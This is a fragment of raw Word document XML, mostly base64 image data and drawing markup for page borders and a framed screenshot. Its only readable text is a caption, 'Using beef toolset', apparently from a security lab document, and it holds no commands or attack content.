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&#10;cTQwm0dPoLNU/6fPvg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Awus1jMEAADDDQAADgAAAAAAAAAAAAAAAAA9AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAA&#10;ACEAnKfS4NNfAQDTXwEAFAAAAAAAAAAAAAAAAACcBgAAZHJzL21lZGlhL2ltYWdlMS5qcGdQSwEC&#10;LQAUAAYACAAAACEAjv2bXN0AAAAFAQAADwAAAAAAAAAAAAAAAAChZgEAZHJzL2Rvd25yZXYueG1s&#10;UEsBAi0AFAAGAAgAAAAhADedwRi6AAAAIQEAABkAAAAAAAAAAAAAAAAAq2cBAGRycy9fcmVscy9l&#10;Mm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAnGgBAAAA&#10;">
                <v:rect id="Rectangle 6268" o:spid="_x0000_s1362" style="position:absolute;left:2029;width:1736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VwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlhN50Uw8hRleRakmOVQvW25Adk2B2NmS3Sdpf7x4KPT7e92Y3mkb01LnasoLXRQSCuLC6&#10;5lLB5+V9noBwHlljY5kU/JCD3XY62WCq7cAn6s++FCGEXYoKKu/bVEpXVGTQLWxLHLi77Qz6ALtS&#10;6g6HEG4auYyiWBqsOTRU2NJbRcXj/G0UZEm7/8rt71A2x1t2/biuDpeVV+plNu7XIDyN/l/85861&#10;gngZh7nhTXgCcvsEAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAPcksVcMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="397E2BE5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Using beef toolset</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6269" o:spid="_x0000_s1363" style="position:absolute;left:15109;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14:paraId="58A99A5D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6270" o:spid="_x0000_s1364" style="position:absolute;left:59192;top:34110;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14:paraId="2A017EBC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 6281" o:spid="_x0000_s1365" type="#_x0000_t75" style="position:absolute;left:127;top:1874;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NawwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvgv8hPGFvmupBpBpFdBf2sotavT+aZ1NsXmoTbf33RhA8DjPzDbNYdbYSd2p86VjBeJSAIM6d&#10;LrlQcMx+hjMQPiBrrByTggd5WC37vQWm2rW8p/shFCJC2KeowIRQp1L63JBFP3I1cfTOrrEYomwK&#10;qRtsI9xWcpIkU2mx5LhgsKaNofxyuFkFidkd/WZ/2uXb9vq4Zf9t9v23Vupr0K3nIAJ14RN+t3+1&#10;gulkNobXm/gE5PIJAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAhBQzWsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId131" o:title=""/>
                </v:shape>
                <v:shape id="Shape 6282" o:spid="_x0000_s1366" style="position:absolute;top:1747;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JzxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RW81U1ikRBdg2iVHlMVxNsj+0yC2bchu03Sf98tFHocZuYbZp1PphUD9a6xrCCeRyCI&#10;S6sbrhRczofXFITzyBpby6Tgmxzkm+enNWbajvxJw8lXIkDYZaig9r7LpHRlTQbd3HbEwbvb3qAP&#10;sq+k7nEMcNPKJIqW0mDDYaHGjnY1lY/Tl1HwPiZXfyuOjzS+W929VXteFGelZi/TdgXC0+T/w3/t&#10;D61gmaQJ/L4JT0BufgAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBiIbJzxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FD58C2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="109594DE" wp14:editId="557CCB42">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="43651" name="Group 4365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60" name="Shape 500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1" name="Shape 500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2" name="Shape 500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3" name="Shape 500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4" name="Shape 500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651" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50065" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50066" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50067" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50068" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5006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30944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F8E8F2D" wp14:editId="0B176FEB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="43652" name="Group 4365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70" name="Shape 500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1" name="Shape 500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2" name="Shape 500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3" name="Shape 500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4" name="Shape 500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652" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50075" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50076" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50077" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
